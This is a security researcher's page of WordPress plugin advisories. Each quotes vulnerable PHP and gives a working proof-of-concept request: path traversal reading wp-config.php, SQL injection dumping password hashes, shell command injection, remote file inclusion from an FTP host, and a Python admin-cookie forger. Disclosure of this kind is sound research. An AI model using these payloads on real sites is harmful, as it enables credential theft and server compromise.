Advisories | ceriksen.com

January 3, 2013 by Charlie Eriksen

WordPress Google Document Embedder arbitrary file disclosure

Advisory

Analysis of vulnerability

Google Document Embedder offers a proxy for forcing a PDF to download rather than use the default browser handler. It implements this through /libs/pdf.php:

if (ini_get('allow_url_fopen') !== "1") {
	if (function_exists('curl_version')) {
		$curl = 1;
	} else {
		$err = "This function is not supported on your web server. Please add ";
		$err .= "<code>allow_url_fopen = 1</code> to your php.ini or enable cURL library. ";
		$err .= "If you are unable to do this, please change the Link Behavior setting to ";
		$err .= "Browser Default in GDE Options.";
		showErr($err);
		exit;
	}
}

if ((isset($_GET['fn'])) && (isset($_GET['file']))) { 
	// check for invalid file type
	if (!preg_match("/\.pdf$/i",$_GET['fn'])) {
		showErr('Invalid file type; action cancelled.');
	}

	// ready file
	$file = urldecode($file);
	$fileParts = parse_url($file);
	if (preg_match("/^https/i", $fileParts['scheme'])) {
		$ssl = true;
	} else {
		$ssl = false;
	}

	// get file
	if ($curl) {
		$code = @curl_get_contents($_GET['file'], $ssl);  
	} else {
		$code = @file_get_contents($_GET['file']); 
	}

	// output file
	header('Content-type: application/pdf');
	header('Content-Disposition: attachment; filename="'.$_GET['fn'].'"');
	echo $code;

if (ini_get('allow_url_fopen') !== "1") {

if (function_exists('curl_version')) {

$curl = 1;

} else {

$err = "This function is not supported on your web server. Please add ";

$err .= "<code>allow_url_fopen = 1</code> to your php.ini or enable cURL library. ";

$err .= "If you are unable to do this, please change the Link Behavior setting to ";

$err .= "Browser Default in GDE Options.";

showErr($err);

exit;

}

if ((isset($_GET['fn'])) && (isset($_GET['file']))) {

// check for invalid file type

if (!preg_match("/\.pdf$/i",$_GET['fn'])) {

showErr('Invalid file type; action cancelled.');

}

// ready file

$file = urldecode($file);

$fileParts = parse_url($file);

if (preg_match("/^https/i", $fileParts['scheme'])) {

$ssl = true;

} else {

$ssl = false;

}

// get file

if ($curl) {

$code = @curl_get_contents($_GET['file'], $ssl);

} else {

$code = @file_get_contents($_GET['file']);

}

// output file

header('Content-type: application/pdf');

header('Content-Disposition: attachment; filename="'.$_GET['fn'].'"');

echo $code;

First it will check if allow_url_fopen is enabled. Then it checks the two variables we need to provide, the “fn”(Filename) and “file” GET parameters. If both are provided it will verify that the filename ends in .pdf. From there, it goes onto deicing how to fetch the file, and eventually call into file_get_contents by passing the file GET parameter straight into the call. Note that the filename is only used to determine the filename returned on line 45. Because it will use file_get_contents if at all possible, we can provide a local path to include. We can for instance fetch the wp-config.php file like this:

http://192.168.80.130/wordpress/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php

1	http://192.168.80.130/wordpress/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php

January 2, 2013 by Charlie Eriksen

WordPress Duplicator plugin arbitrary file disclosure

Analysis of vulnerability

In version 0.3.0 of WordPress duplicator the file /files/installer.rescue.php and /files/installer.template.php which were added for security reasons. The file was made to download an installer file. They both start with this snippet of code::

//DOWNLOAD ONLY: 
if ( isset($_GET['get'])) {

	$file = $_GET['file'];
	if (file_exists($file)) {
		header('Content-Description: File Transfer');
		header('Content-Type: application/octet-stream');
		header('Content-Disposition: attachment; filename=installer.php');
		header('Content-Transfer-Encoding: binary');
		header('Expires: 0');
		header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
		header('Pragma: public');
		header('Content-Length: ' . filesize($file));
		ob_clean();
		@flush();
		if (@readfile($file) == false) {
			$data = file_get_contents($file);
			if ($data == false) {
				die("Unable to read installer file.  The server currently has readfile and file_get_contents disabled on this server.  Please contact your server admin to remove this restriction");
			} else {
				print $data;
			}
		}
		exit;
	} 
}

//DOWNLOAD ONLY:

if ( isset($_GET['get'])) {

$file = $_GET['file'];

if (file_exists($file)) {

header('Content-Description: File Transfer');

header('Content-Type: application/octet-stream');

header('Content-Disposition: attachment; filename=installer.php');

header('Content-Transfer-Encoding: binary');

header('Expires: 0');

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');

header('Pragma: public');

header('Content-Length: ' . filesize($file));

ob_clean();

@flush();

if (@readfile($file) == false) {

$data = file_get_contents($file);

if ($data == false) {

die("Unable to read installer file. The server currently has readfile and file_get_contents disabled on this server. Please contact your server admin to remove this restriction");

} else {

print $data;

}

exit;

}

If the “get” querystring parameter is set, it will read the file specified by the “file” querystring parameter and read that into the response as installer.php. But because this file is deployed by default to all installations and it does not sanitize the “file” variable, we can use it to read any arbitrary file by making a request like this:

http://192.168.80.130/wordpress/wp-content/plugins/duplicator/files/installer.rescue.php?get=&file=../../../../wp-config.php

1	http://192.168.80.130/wordpress/wp-content/plugins/duplicator/files/installer.rescue.php?get=&file=../../../../wp-config.php

November 4, 2012 by Charlie Eriksen

WordPress All Video Gallery Plugin SQL injection vulnerability

Advisory

Secunia Advisory SA50874

Analysis of vulnerability

The All Video Gallery Plugin has two pages, playlist.php and /xml/playlist.php, which both takes a “vid” ID and outputs the result from the query into XML format.

function buildNodes() {
	global $wpdb;

	$video = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix . "allvideogallery_videos WHERE id=" . $_GET['vid']);
	$items = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "allvideogallery_videos WHERE category='" . $video->category . "' AND id!=" . $_GET['vid']);
	$node  = '';

	for ($i = 0, $n = count($items); $i < $n; $i++) {
		$item = $items[$i];

		$node .= '<item>'."\n";
		$node .= '<thumb>'.$item->thumb.'</thumb>'."\n";
		$node .= '<title>'.$item->title.'</title>'."\n";
		$node .= '<link>'.@add_query_arg( "slg", $item->slug, $_GET['page'] ).'</link>'."\n";
		$node .= '</item>'."\n";
	}

	return $node;
}

function buildNodes() {

global $wpdb;

$video = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix . "allvideogallery_videos WHERE id=" . $_GET['vid']);

$items = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "allvideogallery_videos WHERE category='" . $video->category . "' AND id!=" . $_GET['vid']);

$node = '';

for ($i = 0, $n = count($items); $i < $n; $i++) {

$item = $items[$i];

$node .= '<item>'."\n";

$node .= '<thumb>'.$item->thumb.'</thumb>'."\n";

$node .= '<title>'.$item->title.'</title>'."\n";

$node .= '<link>'.@add_query_arg( "slg", $item->slug, $_GET['page'] ).'</link>'."\n";

$node .= '</item>'."\n";

}

return $node;

}

Note however that the “vid” GET parameter is never sanitized, which means that we can inject SQL into it and disclose information from the database by making a simple request to either of the pages like this:

http://192.168.80.130/wordpress/wp-content/plugins/all-video-gallery/xml/playlist.php?vid=2 UNION SELECT 1, 2, user(), @@version, 5, 6, 7, 8, 9, 10, database(), 12, 13, 14, 15, 16, 17, 18

1	http://192.168.80.130/wordpress/wp-content/plugins/all-video-gallery/xml/playlist.php?vid=2 UNION SELECT 1, 2, user(), @@version, 5, 6, 7, 8, 9, 10, database(), 12, 13, 14, 15, 16, 17, 18

October 25, 2012 by Charlie Eriksen

WordPress FireStorm Professional Real Estate Plugin SQL Injection vulnerability

Advisory

Secunia Advisory SA 50873

Analysis of vulnerability

The FireStorm Professional Real Estate Plugin for WordPress offers functionality for an user to search for real estate based on a province or country. It is implemented in the file search.php:

<?php
require("../../../wp-config.php"); 

if(isset($_GET['ProvinceID'])){
	$FSREPCities = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."fsrep_cities WHERE province_id = ".$_GET['ProvinceID']." ORDER BY city_name");
	$FSREPProvince = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."fsrep_provinces WHERE province_id = ".$_GET['ProvinceID']);
	$HTTPREFERER = explode('?', $_SERVER['HTTP_REFERER']);
	if (substr($HTTPREFERER[0], -13) == '/add-listing/') {
		echo "obj.options[obj.options.length] = new Option('Select ".$FSREPconfig['CityLabel'].",'');\n";
	} else {
		echo "obj.options[obj.options.length] = new Option('Show All of ".$FSREPProvince->province_name."','');\n";
	}
	$count = 1;
	foreach ($FSREPCities as $FSREPCities) {
		echo "obj.options[obj.options.length] = new Option('".$FSREPCities->city_name."','".$FSREPCities->city_id."');\n";
		if ($FSREPCities->city_id == $_GET['cvalue']) {
			echo "obj.options[$count].selected = true;";
		}
		$count++;
	}
}
if(isset($_GET['CountryID'])){
	$FSREPProvinces = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."fsrep_provinces WHERE country_id = ".$_GET['CountryID']." ORDER BY province_name");
	$FSREPCountry = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."fsrep_countries WHERE country_id = ".$_GET['CountryID']);
	$count = 1;
	echo "obj.options[obj.options.length] = new Option('Select ".$FSREPconfig['ProvinceLabel']."','');\n";
	foreach ($FSREPProvinces as $FSREPProvinces) {
		echo "obj.options[obj.options.length] = new Option('".$FSREPProvinces->province_name."','".$FSREPProvinces->province_id."');\n";
		if ($FSREPProvinces->province_id == $_GET['cvalue']) {
			echo "obj.options[$count].selected = true;";
		}
		$count++;
	}
}

?>

<?php

require("../../../wp-config.php");

if(isset($_GET['ProvinceID'])){

$FSREPCities = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."fsrep_cities WHERE province_id = ".$_GET['ProvinceID']." ORDER BY city_name");

$FSREPProvince = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."fsrep_provinces WHERE province_id = ".$_GET['ProvinceID']);

$HTTPREFERER = explode('?', $_SERVER['HTTP_REFERER']);

if (substr($HTTPREFERER[0], -13) == '/add-listing/') {

echo "obj.options[obj.options.length] = new Option('Select ".$FSREPconfig['CityLabel'].",'');\n";

} else {

echo "obj.options[obj.options.length] = new Option('Show All of ".$FSREPProvince->province_name."','');\n";

}

$count = 1;

foreach ($FSREPCities as $FSREPCities) {

echo "obj.options[obj.options.length] = new Option('".$FSREPCities->city_name."','".$FSREPCities->city_id."');\n";

if ($FSREPCities->city_id == $_GET['cvalue']) {

echo "obj.options[$count].selected = true;";

}

$count++;

}

if(isset($_GET['CountryID'])){

$FSREPProvinces = $wpdb->get_results("SELECT * FROM ".$wpdb->prefix."fsrep_provinces WHERE country_id = ".$_GET['CountryID']." ORDER BY province_name");

$FSREPCountry = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."fsrep_countries WHERE country_id = ".$_GET['CountryID']);

$count = 1;

echo "obj.options[obj.options.length] = new Option('Select ".$FSREPconfig['ProvinceLabel']."','');\n";

foreach ($FSREPProvinces as $FSREPProvinces) {

echo "obj.options[obj.options.length] = new Option('".$FSREPProvinces->province_name."','".$FSREPProvinces->province_id."');\n";

if ($FSREPProvinces->province_id == $_GET['cvalue']) {

echo "obj.options[$count].selected = true;";

}

$count++;

}

By either providing a ProvinceID or CountryID, we can make the application pass the value into two SQL queries. Note however that in both cases, the value is taken directly from the GET parameter without sanitazion, which opens it up to a SQL injection attack where we can select arbitrary data from the database. For instance, we can select the password hash for an user like this:

http://192.168.80.130/wordpress/wp-content/plugins/fs-real-estate-plugin/search.php?ProvinceID=35335%20UNION%20SELECT%201,%20user_pass,%203,%204,%205,%206,%207,%208%20from%20wp_users

1	http://192.168.80.130/wordpress/wp-content/plugins/fs-real-estate-plugin/search.php?ProvinceID=35335%20UNION%20SELECT%201,%20user_pass,%203,%204,%205,%206,%207,%208%20from%20wp_users

October 24, 2012 by Charlie Eriksen

WordPress Cimy User Manager arbitrary file disclosure

Advisory

Secunia Advisory SA 50834

Analysis of vulnerability

The Cimy User Manager is made to be able to export data from WordPress. The file cimy_user_manager.php has an init action which decides whether or not to download some content from the site:

add_action('init', 'cimy_um_download_database');

function cimy_um_download_database() {
	if (!empty($_POST["cimy_um_filename"])) {
		if (strpos($_SERVER['HTTP_REFERER'], admin_url('users.php?page=cimy_user_manager')) !== false) {
			$cimy_um_filename = $_POST["cimy_um_filename"];
			// protect from site traversing
			$cimy_um_filename = str_replace('../', '', $cimy_um_filename);
			if (!is_file($cimy_um_filename))
				return;

			header("Pragma: "); // Leave blank for issues with IE
			header("Expires: 0");
			header('Vary: User-Agent');
			header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
			header("Content-Type: text/csv");
			header("Content-Type: application/force-download");
			header("Content-Type: application/download");
			header("Content-Disposition: attachment; filename=\"".esc_html(basename($cimy_um_filename))."\";"); // cannot use esc_url any more because prepends 'http' (doh)
			header("Content-Transfer-Encoding: binary");
			header("Content-Length: ".filesize($cimy_um_filename));
			readfile($cimy_um_filename);
			exit();
		}
	}
}

add_action('init', 'cimy_um_download_database');

function cimy_um_download_database() {

if (!empty($_POST["cimy_um_filename"])) {

if (strpos($_SERVER['HTTP_REFERER'], admin_url('users.php?page=cimy_user_manager')) !== false) {

$cimy_um_filename = $_POST["cimy_um_filename"];

// protect from site traversing

$cimy_um_filename = str_replace('../', '', $cimy_um_filename);

if (!is_file($cimy_um_filename))

return;

header("Pragma: "); // Leave blank for issues with IE

header("Expires: 0");

header('Vary: User-Agent');

header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: text/csv");

header("Content-Type: application/force-download");

header("Content-Type: application/download");

header("Content-Disposition: attachment; filename=\"".esc_html(basename($cimy_um_filename))."\";"); // cannot use esc_url any more because prepends 'http' (doh)

header("Content-Transfer-Encoding: binary");

header("Content-Length: ".filesize($cimy_um_filename));

readfile($cimy_um_filename);

exit();

}

First it checks if the cimy_um_filename POST variable is set. Then it goes to check if the referer is from the admin page, which is a flawed way of authentication. But if it thinks you come from the admin page, it will attempt to protect against path traversal. It is pretty obvious that we can fake the referer header. But we can quite easily bypass the path traversal. Lets have a look at an example.

Take this string: …/…//
Now lets see where we match ../: .../...//
Which leaves us with: ../

This tells us that the path traversal “protection” on line 78 can be bypassed trivially.

Additionally, in the case where you’d want to obtain a wp-config.php file, which contains credentials and other very critical information about the blog, we do not need to bypass this, because when init is called, the working directory is the wordpress base folder, which contains the wp-config.php file. Here’s an example request showing how to pull the wp-config.php file:

POST /wordpress/ HTTP/1.0
Host: 192.168.80.130
Referer: http://192.168.80.130/wordpress/wp-admin/users.php?page=cimy_user_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

cimy_um_filename=wp-config.php

POST /wordpress/ HTTP/1.0

Host: 192.168.80.130

Referer: http://192.168.80.130/wordpress/wp-admin/users.php?page=cimy_user_manager

Content-Type: application/x-www-form-urlencoded

Content-Length: 30

cimy_um_filename=wp-config.php

October 23, 2012 by Charlie Eriksen

WordPress Ungallery remote command injection vulnerability

Analysis of vulnerability

The Ungallery for WordPress offers functionality for searching for pictures in a gallery, which is implemented through the plain filesystem in search.php.

$gallerylink = ($_GET['gallerylink']) ;
$search = ($_GET['search']) ;
$dir = $pic_root . $gallerylink;

//	Find galleries
print "Searching in <i>$dir.</i>
<br />
<br />";

print "These galleries matched <i>$search:</i><br />";
$galleries = `find $dir -iname \*$search\* -type d`;

$galleries = explode("\n", $galleries);

$gallerylink = ($_GET['gallerylink']) ;

$search = ($_GET['search']) ;

$dir = $pic_root . $gallerylink;

// Find galleries

print "Searching in <i>$dir.</i>

<br />

<br />";

print "These galleries matched <i>$search:</i><br />";

$galleries = `find $dir -iname \*$search\* -type d`;

$galleries = explode("\n", $galleries);

Note that the backtick character in PHP has a special meaning, as opposed to the ” and ‘. When you wrap something in 2 backtick characters, it will act as if the contents between them is passed to shell_exec. Note however that the $search variable, which is extracted from the search GET variable, is never sanitized before passed into the exec on line 28. This means that we can pull off a remote command injection with a simple request like this:

http://192.168.80.130/wordpress/?x=x&search=x | dir

1	http://192.168.80.130/wordpress/?x=x&search=x \| dir

October 15, 2012 by Charlie Eriksen

WordPress Crayon Syntax Highlighter remote file inclusion vulnerability

Advisory

Secunia advisory SA 50804

Analysis of vulnerability

The Crayon Syntax highlighter implements a vulnerable RPC-like system for AJAX in /util/ajax.php and /util/preview.php. Both files share these 3 lines of code as being the first ones in both:

require_once('../crayon_wp.class.php');
crayon_die_if_not_php($_GET['wp_load'], 'wp-load');
require_once($_GET['wp_load']);

require_once('../crayon_wp.class.php');

crayon_die_if_not_php($_GET['wp_load'], 'wp-load');

require_once($_GET['wp_load']);

So it apperas that at least it attempts to do some validation. Let us see how that is implemented in global.php(Included by crayon_wp.class.php):

// Checks if the input is a valid PHP file and matches the $valid filename
function crayon_is_php_file($filepath, $valid) {
	$path_wp_load = pathinfo($filepath);
	return is_file($filepath) && $path_wp_load['extension'] === 'php' && $path_wp_load['filename'] === $valid;
}

// Stops the script if crayon_is_php_file() returns false
function crayon_die_if_not_php($filepath, $valid) {
	if (!crayon_is_php_file($filepath, $valid)) {
		die("Incorrect arguments for '$valid'");
	}
}

187

188

189

190

191

192

193

194

195

196

197

198

// Checks if the input is a valid PHP file and matches the $valid filename

function crayon_is_php_file($filepath, $valid) {

$path_wp_load = pathinfo($filepath);

return is_file($filepath) && $path_wp_load['extension'] === 'php' && $path_wp_load['filename'] === $valid;

}

// Stops the script if crayon_is_php_file() returns false

function crayon_die_if_not_php($filepath, $valid) {

if (!crayon_is_php_file($filepath, $valid)) {

die("Incorrect arguments for '$valid'");

}

So it calls crayon_is_php_file which checks if the provided path is a file, the extension is “php” and the filename is what is expected, which in this case is wp-load.php. In theory, this should be safe if we assume that is_file only returns true for local file. However due to is_file also supporting FTP, we can get it to return true for a remote file on a FTP server! This means that if the server allows url includes, we can do a remote file include from a malicious FTP server hosting a wp-load.php file through an URL like this, either through ajax.php or preview.php:

http://192.168.80.130/wordpress/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=ftp://192.168.80.201/wp-load.php

August 20, 2012 by Charlie Eriksen

WordPress Zingiri Shop SQL injection vulnerabilities

Advisory
Secunia Advisory SA 49398

Analysis of vulnerability

This vulnerability relies on a lack of validation in the Zingiri Web Shops IsAdmin function in /fws/includes/subs.inc.php from the fws_cust cookies. The method tries to determine if the user is an admin like this:

// is the id of an admin?
Function IsAdmin() {
	Global $dbtablesprefix,$integrator;

	if ($integrator->isAdmin()) return true;
	//joomla
	if (wsCurrentCmsUserIsShopAdmin()) return true;

	if (function_exists('wsLiveIsAdmin') && wsLiveIsAdmin()) return true;

	if (!isset($_COOKIE['fws_cust'])) { return false; }
	$fws_cust = explode("#", $_COOKIE['fws_cust']);
	$customerid = $fws_cust[1];
	$md5pass = $fws_cust[2];
	if (is_null($customerid)) { return false; }
	$f_query = "SELECT * FROM ".$dbtablesprefix."customer WHERE ID = " . $customerid;
	if ($f_sql = mysql_query($f_query)) {
		while ($f_row = mysql_fetch_row($f_sql)) {
			if ($f_row[13] == "ADMIN" && md5($f_row[2]) == $md5pass)
			{
				if ($f_row[6] == GetUserIP()) {
					return true; }
					else {
						return false; }
			} else
			{
				return false;
			}
		}
	}
	return false;
}

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

// is the id of an admin?

Function IsAdmin() {

Global $dbtablesprefix,$integrator;

if ($integrator->isAdmin()) return true;

//joomla

if (wsCurrentCmsUserIsShopAdmin()) return true;

if (function_exists('wsLiveIsAdmin') && wsLiveIsAdmin()) return true;

if (!isset($_COOKIE['fws_cust'])) { return false; }

$fws_cust = explode("#", $_COOKIE['fws_cust']);

$customerid = $fws_cust[1];

$md5pass = $fws_cust[2];

if (is_null($customerid)) { return false; }

$f_query = "SELECT * FROM ".$dbtablesprefix."customer WHERE ID = " . $customerid;

if ($f_sql = mysql_query($f_query)) {

while ($f_row = mysql_fetch_row($f_sql)) {

if ($f_row[13] == "ADMIN" && md5($f_row[2]) == $md5pass)

{

if ($f_row[6] == GetUserIP()) {

return true; }

else {

return false; }

} else

{

return false;

}

return false;

}

It splits(Explode!!) the fws_cust cookie by the # character, extracts a md5′ed password and an userID, and then fetches the corresponding user in the database. Notice however on line 232 and 235 that it does not sanitize the input, leading to a SQL injection. We can abuse this to forge a cookie which gives us admin rights using this simple python script:

def ToHexString(input):
        hexString = "0x"
        for s in input:
                hexString += hex(ord(s))[2:]
        return hexString

cookie = "fws_cust=X#99999 UNION SELECT 1, 2, 3, 4, 5, 6, %s, 8, 9, 10, 11, 12, 13, %s, 15, 16, 17, 18, 19 FROM wp_zing_customer#eccbc87e4b5ce2fe28308fd9f2a7baf3" % (ToHexString(raw_input("Enter attacker IP:")), ToHexString("ADMIN"))

def ToHexString(input):

hexString = "0x"

for s in input:

hexString += hex(ord(s))[2:]

return hexString

cookie = "fws_cust=X#99999 UNION SELECT 1, 2, 3, 4, 5, 6, %s, 8, 9, 10, 11, 12, 13, %s, 15, 16, 17, 18, 19 FROM wp_zing_customer#eccbc87e4b5ce2fe28308fd9f2a7baf3" % (ToHexString(raw_input("Enter attacker IP:")), ToHexString("ADMIN"))

Numerous other vulnerabilities were fixed that used same attack vector, as a result of copy paste. These can be found by here quite easily, and exploited the same way.

July 25, 2012 by Charlie Eriksen

WordPress GD Star Rating information disclosure vulnerability

Advisory
Secunia Advisory SA 49850

Analysis
The GD Star Rating plugin “allows you to set up advanced rating and review system for post types and comments in your blog using single, multi and thumbs ratings”. Through its admin interface, you can export some data, such as T2 templates and votes. The interesting thing it will allow you to do, is export user data. This will include userID, username, user email address, what vote was casted on which post, when the vote was cast, IP and user agent. However, a flaw exists in the code in export.php which allows for information disclosure of these values.

The file will import some configuration and export classes, and then start figuring out what to export. It then takes the “ex” value to determine the export type, “de” for the data to export(Article or comment data), and then “us” for how much data to export.

require_once("./code/cls/export.php");
require_once("./config.php");
$wpload = get_gdsr_wpload_path();
require($wpload);

global $wpdb;

if (isset($_GET["ex"])) {
    $export_type = $_GET["ex"];
    $get_data = $_GET;

    switch($export_type) {
        case "user":
            $export_name = $export_type.'_'.$_GET["de"];
            break;
        case "t2":
            $export_name = 't2';
            break;
        case "t2full":
            $export_name = 't2_full';
            break;
    }

    switch($export_type) {
        case "user":
            $values = array("us" => array("min", "nor"), "de" => array("article", "comment"));

            foreach ($get_data as $key => $value) {
                if (isset($values[$key])) {
                    if (!in_array($value, $values[$key])) {
                        die("invalid_request");
                    }
                } else if ($key != "ex") {
                    if ($value !== "on") {
                        die("invalid_request");
                    }
                }
            }

            header('Content-type: text/csv');
            header('Content-Disposition: attachment; filename="gdsr_export_'.$export_name.'.csv"');
            $sql = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_data);
            $rows = $wpdb->get_results($sql, ARRAY_N);
            if (count($rows) > 0) {
                foreach ($rows as $row) {
                    echo '"'.join('", "', $row).'"';
                    echo "\r\n";
                }
            }
            break;

require_once("./code/cls/export.php");

require_once("./config.php");

$wpload = get_gdsr_wpload_path();

require($wpload);

global $wpdb;

if (isset($_GET["ex"])) {

$export_type = $_GET["ex"];

$get_data = $_GET;

switch($export_type) {

case "user":

$export_name = $export_type.'_'.$_GET["de"];

break;

case "t2":

$export_name = 't2';

break;

case "t2full":

$export_name = 't2_full';

break;

}

switch($export_type) {

case "user":

$values = array("us" => array("min", "nor"), "de" => array("article", "comment"));

foreach ($get_data as $key => $value) {

if (isset($values[$key])) {

if (!in_array($value, $values[$key])) {

die("invalid_request");

}

} else if ($key != "ex") {

if ($value !== "on") {

die("invalid_request");

}

header('Content-type: text/csv');

header('Content-Disposition: attachment; filename="gdsr_export_'.$export_name.'.csv"');

$sql = GDSRExport::export_users($_GET["us"], $_GET["de"], $get_data);

$rows = $wpdb->get_results($sql, ARRAY_N);

if (count($rows) > 0) {

foreach ($rows as $row) {

echo '"'.join('", "', $row).'"';

echo "\r\n";

}

break;

It calls into /cls/export.phps export_users function:

function export_users($user_data = "min", $data_export = "article", $get_data = array()) {
    global $table_prefix;
    $columns = array();
    $select = array();
    $where = array();
    $tables = array();

    $tables[] = $table_prefix."gdsr_votes_log v";
    $tables[] = $table_prefix."users u";
    $tables[] = $table_prefix."posts p";
    $where[] = "v.vote_type = ''".$data_export."''";
    $where[] = "v.user_id = u.id";
    
    switch ($user_data) {
        case "min":
            $select[] = "u.id as user_id";
            $columns[] = "user_id";
            break;
        case "nor":
            $select[] = "u.id as user_id";
            $select[] = "u.display_name";
            $select[] = "u.user_email";
            $columns[] = "user_id";
            $columns[] = "user_name";
            $columns[] = "user_email";
            break;
    }
    
    $select[] = "p.id";
    $columns[] = "post_id";
    
    if ($get_data["pt"] == "on") {
        $select[] = "p.post_title";
        $columns[] = "post_title";
    }
    if ($get_data["pd"] == "on") {
        $select[] = "p.post_date";
        $columns[] = "post_date";
    }
    switch ($data_export) {
        case "article":
            $where[] = "v.id = p.id";
            break;
        case "comment":
            $select[] = "c.comment_id";
            $columns[] = "comment_id";
            $tables[] = $table_prefix."comments c";
            $where[] = "v.id = c.comment_id";
            $where[] = "p.id = c.comment_post_id";
            if ($get_data["ca"] == "on") {
                $select[] = "c.comment_author";
                $columns[] = "comment_author";
            }
            if ($get_data["cd"] == "on") {
                $select[] = "c.comment_date";
                $columns[] = "comment_date";
            }
            break;
    }        
    
    $select[] = "v.vote";
    $select[] = "v.voted";
    $columns[] = "vote";
    $columns[] = "vote_date";
    
    if ($get_data["ip"] == "on") {
        $select[] = "v.ip";
        $columns[] = "ip";
    }
    if ($get_data["ua"] == "on") {
        $select[] = "v.user_agent";
        $columns[] = "user_agent";
    }
    
    echo join(", ", $columns)."\r\n";
    $j_select = join(", ", $select);
    $j_where = join(" and ", $where);
    $j_tables = join(", ", $tables);
    
    return sprintf("select %s from %s where %s order by u.id", $j_select, $j_tables, $j_where);
}

function export_users($user_data = "min", $data_export = "article", $get_data = array()) {

global $table_prefix;

$columns = array();

$select = array();

$where = array();

$tables = array();

$tables[] = $table_prefix."gdsr_votes_log v";

$tables[] = $table_prefix."users u";

$tables[] = $table_prefix."posts p";

$where[] = "v.vote_type = ''".$data_export."''";

$where[] = "v.user_id = u.id";

switch ($user_data) {

case "min":

$select[] = "u.id as user_id";

$columns[] = "user_id";

break;

case "nor":

$select[] = "u.id as user_id";

$select[] = "u.display_name";

$select[] = "u.user_email";

$columns[] = "user_id";

$columns[] = "user_name";

$columns[] = "user_email";

break;

}

$select[] = "p.id";

$columns[] = "post_id";

if ($get_data["pt"] == "on") {

$select[] = "p.post_title";

$columns[] = "post_title";

}

if ($get_data["pd"] == "on") {

$select[] = "p.post_date";

$columns[] = "post_date";

}

switch ($data_export) {

case "article":

$where[] = "v.id = p.id";

break;

case "comment":

$select[] = "c.comment_id";

$columns[] = "comment_id";

$tables[] = $table_prefix."comments c";

$where[] = "v.id = c.comment_id";

$where[] = "p.id = c.comment_post_id";

if ($get_data["ca"] == "on") {

$select[] = "c.comment_author";

$columns[] = "comment_author";

}

if ($get_data["cd"] == "on") {

$select[] = "c.comment_date";

$columns[] = "comment_date";

}

break;

}

$select[] = "v.vote";

$select[] = "v.voted";

$columns[] = "vote";

$columns[] = "vote_date";

if ($get_data["ip"] == "on") {

$select[] = "v.ip";

$columns[] = "ip";

}

if ($get_data["ua"] == "on") {

$select[] = "v.user_agent";

$columns[] = "user_agent";

}

echo join(", ", $columns)."\r\n";

$j_select = join(", ", $select);

$j_where = join(" and ", $where);

$j_tables = join(", ", $tables);

return sprintf("select %s from %s where %s order by u.id", $j_select, $j_tables, $j_where);

}

Here we see it takes in the “de”, “us”, and further get parameters and starts building up a SQL query to return. What we notice is that at no point so far have we seen any validation that the calling user is an admin. Also we notice that it checks the GET parameters “ip” and “ua”, which are used to toggle whether or not to return the IP and user agent information

Because of the lack of validation of the calling user, we can create an extremely simple request, which will export this data in clear text, including username, email, ip, and user agent.

GET /wordpress/wp-content/plugins/gd-star-rating/export.php?ex=user&de=article&us=nor&ip=on&ua=on HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-content/plugins/gd-star-rating/export.php?ex=user&de=article&us=nor&ip=on&ua=on HTTP/1.1 Host: 192.168.80.130

July 25, 2012 by Charlie Eriksen

WordPress Flexi Quote Rotator plugin multiple vulnerabilities

Advisory
Secunia Advisory SA 49910

Analysis
The admin interface of the Flexi Quote Rotator plugin for WordPress implements a way for editing a quote through the displayManagementPage function in /classes/quote-rotator-management.class.php.

function displayManagementPage()
{
	global $wpdb;
	
	echo "\t\t<div class=\"wrap\">\n";
	if( $_GET['action']=='edit' )
	{
		$sql = "SELECT * FROM `" . $this->tableName . "` WHERE `id` = " . $_GET['id'];
		$results = $wpdb->get_results($sql);
		$r = $results[0];
		echo "\\t\\t\\t<h2>Edit Quote</h2>\\n";
		echo "\\t\\t\\t<form name=\"EditQuotesForm\" method=\"post\" action=\"?page=flexi-quote-rotator.php\">\\n";
		echo "\\t\\t\\t\\t<p class=\"submit\">\n";
		echo "\\t\\t\\t\\t\\t<input type=\"submit\" name=\"submit\" value=\"Update Quote &raquo;\" />\\n";
		echo "\\t\\t\\t\\t</p>\n";
		echo "\\t\\t\\t\\t<table class=\"editform\" width=\"100%\" cellspacing=\"2\" cellpadding=\"5\">\\n";
		echo "\\t\\t\\t\\t\\t<tr>\n";
		echo "\\t\\t\\t\\t\\t\\t<th width=\"33%\" scope=\"row\" valign=\"top\"><label for=\"quote\">Quote:</label></th>\\n";
		echo "\\t\\t\\t\\t\\t\\t<td width=\"67%\"><textarea name=\"quote\" style=\"width:350px;height:200px;\"/>".stripslashes($r->quote)."</textarea></td>\\n";
		echo "\\t\\t\\t\\t\\t</tr>\\n";
		echo "\\t\\t\\t\\t\\t<tr>\\n";
		echo "\\t\\t\\t\\t\\t\\t<th width=\"33%\" scope=\"row\" valign=\"top\"><label for=\"author\">Author:</label></th>\\n";
		echo "\\t\\t\\t\\t\\t\\t<td width=\"67%\"><input type=\"text\" name=\"author\" style=\"width:350px;\" value=\"".stripslashes($r->author)."\"/></td>\\n";
		echo "\\t\\t\\t\\t\\t</tr>\\n";
		echo "\\t\\t\\t\\t</table>\n";
		echo "\\t\\t\\t\\t<input type=\"hidden\" name=\"editQuote\" value=\"1\" />\\n";
